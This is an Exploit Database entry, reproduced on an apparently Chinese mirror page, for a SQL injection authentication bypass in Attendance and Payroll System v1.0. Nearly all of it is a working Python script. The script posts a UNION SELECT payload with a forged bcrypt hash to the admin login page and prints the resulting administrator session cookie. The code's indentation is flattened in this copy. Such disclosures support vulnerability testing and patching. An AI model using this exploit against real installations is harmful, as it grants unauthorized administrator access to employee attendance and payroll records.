Attendance and Payroll System v1.0 – SQLi Authentication Bypass

• Exploit Database
• 15 阅读

• 作者： pr0z
  日期： 2022-03-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50802/

• # Exploit Title: Attendance and Payroll System v1.0 - SQLi Authentication Bypass
  # Date: 04/03/2022
  # Exploit Author: pr0z
  # Vendor Homepage: https://www.sourcecodester.com
  # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/apsystem.zip
  # Version: v1.0
  # Tested on: Linux, MySQL, Apache
  
  import requests
  import sys
  from requests.exceptions import ConnectionError
  
  
  print('\n>> Attendance and Payroll System v1.0')
  print('>> Authentication Bypass through SQL injection')
  print('>> By pr0z\n')
  
  login_path = '/apsystem/admin/login.php'
  index_path = '/apsystem/admin/index.php'
  
  payload = "username=nobodyhavethisusername' UNION SELECT 1 as id, 'myuser' as username, '$2y$10$UNm8zqwv6d07rp3zr6iGD.GXNqo/P4qB7fUZB79M3vmpQ6SidGi.G' as password ,'zzz' as firstname,'zzz' as lastname,'zzz.php' as photo, '2018-04-30' as created_on -- &password=test&login="
  headers = {'Content-Type': 'application/x-www-form-urlencoded'}
  #proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
  
  
  # Check for arguments
  if len(sys.argv) < 2 or '-h' in sys.argv:
  print("[!] Usage: python3 apsystem_sqli.py http://127.0.0.1")
  sys.exit()
  
  # Bypass Authentication
  target = sys.argv[1]
  print("[+] Extracting Administrator cookie using SQLi ...")
  sess = requests.Session()
  try:
  sess.get(target + index_path,headers=headers, verify=False)
  sess.post(target + login_path, data=payload, headers=headers,verify=False)
  except ConnectionError:
  print('[-] We were unable to establish a connection')
  sys.exit()
  
  cookie_val = sess.cookies.get_dict().get("PHPSESSID")
  
  print("[+] Use the following cookie:\n")
  print(f"PHPSESSID: {cookie_val}")